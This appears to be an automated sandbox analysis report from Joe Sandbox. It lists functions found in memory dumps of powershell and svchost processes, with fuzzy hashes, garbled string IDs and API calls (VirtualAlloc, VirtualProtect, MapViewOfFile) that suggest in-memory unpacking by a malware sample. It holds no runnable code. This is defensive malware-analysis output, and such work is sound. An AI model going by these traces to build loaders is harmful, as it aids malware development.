                                                                                                                                                                                          Function 07001BB8 Relevance: 14.2, Strings: 11, Instructions: 462COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$t~qq$$^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-1543618958
                                                                                                                                                                                          • Opcode ID: ec674576a3809451214801533da5a5f20c29991f30d6619ddd4974752bdca805
                                                                                                                                                                                          • Instruction ID: 270e6c6074480496d802430805e7ceb1bbeb25ceaaa97c258d7efadb5fd22d85
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec674576a3809451214801533da5a5f20c29991f30d6619ddd4974752bdca805
                                                                                                                                                                                          • Instruction Fuzzy Hash: 38E15770B0021A9FEB549B798804B6EBBE2BF85320F24866AD515CF391DF32D846C7D1
                                                                                                                                                                                          Function 0700D698 Relevance: 14.1, Strings: 11, Instructions: 305COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                                                                                                                                                                          • API String ID: 0-459999756
                                                                                                                                                                                          • Opcode ID: 581ef4d41cdc4401c19737d2405f1ac026619d5d43a9fa428ff353f1cf71331d
                                                                                                                                                                                          • Instruction ID: 6b8496b634c9228c638c0a08b158c7c844b1793c196351ece0b65a1bbd571809
                                                                                                                                                                                          • Opcode Fuzzy Hash: 581ef4d41cdc4401c19737d2405f1ac026619d5d43a9fa428ff353f1cf71331d
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5B1E374B002099FEB549FA9D408B6EBBE2AF89320F248569E8059B3D5DA31DC41C7F1
                                                                                                                                                                                          Function 070023C8 Relevance: 12.8, Strings: 10, Instructions: 304COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-3512890053
                                                                                                                                                                                          • Opcode ID: ec4d3c4a025c43435601bf6a346e97a3bef871ef5501078e988e4519866a064c
                                                                                                                                                                                          • Instruction ID: 9da60946566f626cd4dd30f412c0755cfcfa0004f8a6b6c3a9d54f09f26751e3
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec4d3c4a025c43435601bf6a346e97a3bef871ef5501078e988e4519866a064c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DA158B57042068FEB654A78981867A7BE5BF81220F1486BAD805CB2D6DF31C885C7E1
                                                                                                                                                                                          Function 0700CE20 Relevance: 11.5, Strings: 9, Instructions: 230COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
                                                                                                                                                                                          • API String ID: 0-202320237
                                                                                                                                                                                          • Opcode ID: 411ac195614c673b1d1ac5f7f1e200a936af041883f38baa70a8db269f8dc313
                                                                                                                                                                                          • Instruction ID: 5b4dfcfd6834cbf06e42ea19135fcdc92bf50fb8458e48e7942812a3abe94f47
                                                                                                                                                                                          • Opcode Fuzzy Hash: 411ac195614c673b1d1ac5f7f1e200a936af041883f38baa70a8db269f8dc313
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62810B74B102059FEB649EA8C414BAE7BE2AF84720F148669E8059B3D1DF32DD42C7F1
                                                                                                                                                                                          Function 07005198 Relevance: 10.5, Strings: 8, Instructions: 493COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-3732357466
                                                                                                                                                                                          • Opcode ID: 611a53bb56dce7c2098e58dbd7e6b937bc7d0dbddd73d6eb4b4d582adfc87924
                                                                                                                                                                                          • Instruction ID: 59244623e7334f2d1984d062faa855c0c61725c3bc99ae06a78ddbd3b3fb8369
                                                                                                                                                                                          • Opcode Fuzzy Hash: 611a53bb56dce7c2098e58dbd7e6b937bc7d0dbddd73d6eb4b4d582adfc87924
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F18BB4B043069FEB148E79DC54E6ABBE6AF85220F24867AD405CF291DA31C855CFE1
                                                                                                                                                                                          Function 07006658 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl
                                                                                                                                                                                          • API String ID: 0-2812958722
                                                                                                                                                                                          • Opcode ID: 609b41b67dc4edf7b0d48f053a7f29aadfee5118bcfaf65735c1bc544c48992f
                                                                                                                                                                                          • Instruction ID: 5bb96d538134c97cf60b1c913154443e7d073ad9ede954e8c36ca4225646810c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 609b41b67dc4edf7b0d48f053a7f29aadfee5118bcfaf65735c1bc544c48992f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BC1A6B0E00205CFE764CB98C550A6EBBF7AF85320F148669D8556B795CA33EC92CBD1
                                                                                                                                                                                          Function 0700DD50 Relevance: 10.3, Strings: 8, Instructions: 289COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-3865595929
                                                                                                                                                                                          • Opcode ID: 841bc693aff7616fd970f938c0418fd4589bc8ba54f6789d05744e06a89a0e3e
                                                                                                                                                                                          • Instruction ID: 8a17bf2586e9b3956e5bf6ef49eaf38b20694ce476379fd2a9b9918be0bea03b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 841bc693aff7616fd970f938c0418fd4589bc8ba54f6789d05744e06a89a0e3e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82A1C4B070020ADFEB599EA8C5447BA7BE2BF85320F14C966E8119B2D5CB31DC85C7E1
                                                                                                                                                                                          Function 070099F0 Relevance: 9.2, Strings: 7, Instructions: 478COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-1608119003
                                                                                                                                                                                          • Opcode ID: 156ba48a4a37bdb407a40894fdb7b030ae41306a322a832f9be94ac9b6665175
                                                                                                                                                                                          • Instruction ID: 592570df0c84c37188ad212c6c0481d2462473ac8547a7e5fc81ba8c03089ef1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 156ba48a4a37bdb407a40894fdb7b030ae41306a322a832f9be94ac9b6665175
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82F138B1B142058FE7548BA894017AABBE2AFC6220F14867AD459CB3D3DF31EC45CBD1
                                                                                                                                                                                          Function 0700D334 Relevance: 8.9, Strings: 7, Instructions: 162COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-2461640029
                                                                                                                                                                                          • Opcode ID: 691eaef2010c6ffb518465a03a4457118188b1b93306f71246eb890471dbcd76
                                                                                                                                                                                          • Instruction ID: e3ce1ad46bfe5d28d91d18443e3e091bf91b7e764e0eec149e6e6c82e2327961
                                                                                                                                                                                          • Opcode Fuzzy Hash: 691eaef2010c6ffb518465a03a4457118188b1b93306f71246eb890471dbcd76
                                                                                                                                                                                          • Instruction Fuzzy Hash: FB51E4B470020ADFEB648E94C544B6A77E2AF45335F5882AAE8159F2D0C771EC84CBF1
                                                                                                                                                                                          Function 0700DD4D Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-3997570045
                                                                                                                                                                                          • Opcode ID: 61c8031dae2bf4d06e85ca37f064c507d5d2f5ca19f8a96f306c14f56d3fe3c2
                                                                                                                                                                                          • Instruction ID: 07b1e523222974115acb36010959b9bb8f25c8fc285f6d485b8a885364b00a89
                                                                                                                                                                                          • Opcode Fuzzy Hash: 61c8031dae2bf4d06e85ca37f064c507d5d2f5ca19f8a96f306c14f56d3fe3c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE61AFB071020ADFFB689E94C544BBAB7E2BB45325F14C666E8119B2D5C731E980CBF1
                                                                                                                                                                                          Function 0700C3F8 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-3272787073
                                                                                                                                                                                          • Opcode ID: 71e45b303b92093ac7c73bb4471a05d7b1732bdb767495ad99d4fba4d376f910
                                                                                                                                                                                          • Instruction ID: adfd250d5f4962c3a6e6b664c6b7dc342594f46a5718941ff0be7aa5e681a3af
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71e45b303b92093ac7c73bb4471a05d7b1732bdb767495ad99d4fba4d376f910
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE51D2B4A04209DFFB558E64C4046FB7BE2BF86221F14C7A6D4158F291DB31D985CBE1
                                                                                                                                                                                          Function 0700CF46 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                                                                                                                                                                          • API String ID: 0-3846404929
                                                                                                                                                                                          • Opcode ID: 26732601a6aa4533e0f8feee02ba3601e63786d2ef88c17224619bdcc85ce082
                                                                                                                                                                                          • Instruction ID: 0bbbda456c8d7f424c649c9d203ce86c861b0182c670ae81f668497ff24bff01
                                                                                                                                                                                          • Opcode Fuzzy Hash: 26732601a6aa4533e0f8feee02ba3601e63786d2ef88c17224619bdcc85ce082
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E319774B00215DFD754DF94C444B5DBBE2BF48720F258256E909AB390C732DD428BE1
                                                                                                                                                                                          Function 0700E3AC Relevance: 5.3, Strings: 4, Instructions: 305COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$4'^q$4'^q
                                                                                                                                                                                          • API String ID: 0-1388450209
                                                                                                                                                                                          • Opcode ID: e217862333cc892e9359f6f4c828cf905dc0f9f17390939be2c9d497865b0faa
                                                                                                                                                                                          • Instruction ID: de70feacb776db0f1eb1ddd2614b6fa0f79be0b5eb8737f09b057f09663da3d2
                                                                                                                                                                                          • Opcode Fuzzy Hash: e217862333cc892e9359f6f4c828cf905dc0f9f17390939be2c9d497865b0faa
                                                                                                                                                                                          • Instruction Fuzzy Hash: A2C1E2B4A00205DFDB60EB94C955B5EBBF3FF84324F148A29D5057B395CB32A846CB91
                                                                                                                                                                                          Function 07006655 Relevance: 5.3, Strings: 4, Instructions: 252COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$(fl$(fl
                                                                                                                                                                                          • API String ID: 0-1133856015
                                                                                                                                                                                          • Opcode ID: 89f78f02d3ec466970ddb32a8e80ae16c85f08dd0e48f210846ac990d4094a36
                                                                                                                                                                                          • Instruction ID: 7eff7c8cdd3ac60f69dd83950282e84006cac3188b76a0c8425654ae729fcac5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 89f78f02d3ec466970ddb32a8e80ae16c85f08dd0e48f210846ac990d4094a36
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CA18EB4E00205DBEB60CF98C540A6EBBF7BF85724F148669D8566B690C733A891CBD1
                                                                                                                                                                                          Function 07007070 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$(fl$(fl
                                                                                                                                                                                          • API String ID: 0-1133856015
                                                                                                                                                                                          • Opcode ID: 053348291e6d260f07ef4a3978029e0d65587d5706937fd3341b24bfa6b2c4e0
                                                                                                                                                                                          • Instruction ID: 9b75727979d46cfad3a7862cc99be2b68ea3c83d1770fd2ac0ca6d755d4ae4b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 053348291e6d260f07ef4a3978029e0d65587d5706937fd3341b24bfa6b2c4e0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 867162B4B00205DFEB54CBA8C541A9ABBF2EF85320F159265D9056B395CB35EC81CBD1
                                                                                                                                                                                          Function 070000F0 Relevance: 5.2, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$XYl$XYl
                                                                                                                                                                                          • API String ID: 0-2914419335
                                                                                                                                                                                          • Opcode ID: b02286510ecad2628d05bfd52c97f7040f5ebd8e02547a840a37c3f00be30290
                                                                                                                                                                                          • Instruction ID: 6ae8cb2bac8f1a10c5324e901309fe1dfaf067faafd9a07d032098047630699a
                                                                                                                                                                                          • Opcode Fuzzy Hash: b02286510ecad2628d05bfd52c97f7040f5ebd8e02547a840a37c3f00be30290
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0511BB0B043069FDB558BB8C914BAA7BE26F85320F1486A6D5058F3D6DB31CD85C7D2
                                                                                                                                                                                          Function 0700E115 Relevance: 5.1, Strings: 4, Instructions: 116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: XRcq$XRcq$tP^q$$^q
                                                                                                                                                                                          • API String ID: 0-3596674671
                                                                                                                                                                                          • Opcode ID: 418b2055aac63595168c313653b0832718d5edd212aaa215b65f5f8916155e09
                                                                                                                                                                                          • Instruction ID: 947fb1850fadd984cb7b838bd47d06d7b7fe490e8ade4f4b40304fd6079145e4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 418b2055aac63595168c313653b0832718d5edd212aaa215b65f5f8916155e09
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE4175B1A00205DBEB64EE55C544BA9BBF2AF85720F19CAA9D8147B3D4C731DD40CBD1
                                                                                                                                                                                          Function 07000E90 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-2125118731
                                                                                                                                                                                          • Opcode ID: a4e737391e236c983bb1c93290469fd038ef7f5f03d5bea0d64a3c28d8859e17
                                                                                                                                                                                          • Instruction ID: 63fe1941492838e127d2cf80de7bf521d933360e17011601a71db0c956602df9
                                                                                                                                                                                          • Opcode Fuzzy Hash: a4e737391e236c983bb1c93290469fd038ef7f5f03d5bea0d64a3c28d8859e17
                                                                                                                                                                                          • Instruction Fuzzy Hash: C7218BB531034A9FFB74597A5840B3BBADA5BC1725F24853AA509CF7C2CE32D84183A1
                                                                                                                                                                                          Function 070089E8 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-2125118731
                                                                                                                                                                                          • Opcode ID: d2c1ea7e89fee4bd7e9964d765f8c13b145991a94327f424d4136c254ec0d935
                                                                                                                                                                                          • Instruction ID: 80f560bae3e5b147dc7b00b7d561d00e7c6cfc78e52be1b10559caecd63e820e
                                                                                                                                                                                          • Opcode Fuzzy Hash: d2c1ea7e89fee4bd7e9964d765f8c13b145991a94327f424d4136c254ec0d935
                                                                                                                                                                                          • Instruction Fuzzy Hash: F611D5F1A00306DBFF748E95850066AB7F0BF82630F18C26AD8148B6C5DB31D565C7D1

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 032F02D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 032F0326
                                                                                                                                                                                            • Part of subcall function 032F00A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032F00CD
                                                                                                                                                                                            • Part of subcall function 032F00A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032F0279
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 032F0378
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 032F03E7
                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032F0407
                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 032F042E
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 032F0456
                                                                                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 032F0471
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000003.2266534852.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_3_32f0000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                          • API String ID: 3867569247-3772416878
                                                                                                                                                                                          • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                          • Instruction ID: 452be7c456bf6d3ee0c2f1560e45a8992fffeda5d2243e1688530a581464573c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF611DB5910609EFDB20DFA5C884ADEFBB9FF08350F14C529EA59A7241D770A980CF60
                                                                                                                                                                                          Function 032F00A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032F00CD
                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032F0279
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000003.2266534852.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_3_32f0000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                          • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                          • Instruction ID: ef8bf33d4634d17b3a7b4298b12f808532f76fe5161d012fe8ed125317e02c4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                          • Instruction Fuzzy Hash: 61718F71E1424ADFDB41DF98C981BEEBBF0AF09314F2880A5E555F7242C274AA91CF64

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 032F0283 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000003.2266534852.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_3_32f0000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                          • Instruction ID: 23c2331730da81dbabf5bc0ad6b59622636c948b042a0ce2f03d64ce46956a62
                                                                                                                                                                                          • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78F04F75A22201CFC724CF09C944895F7B6EB95724B69C4A5D505AB262D3B0DD85C760

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:23.7%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:45%
                                                                                                                                                                                          Total number of Nodes:20
                                                                                                                                                                                          Total number of Limit Nodes:0
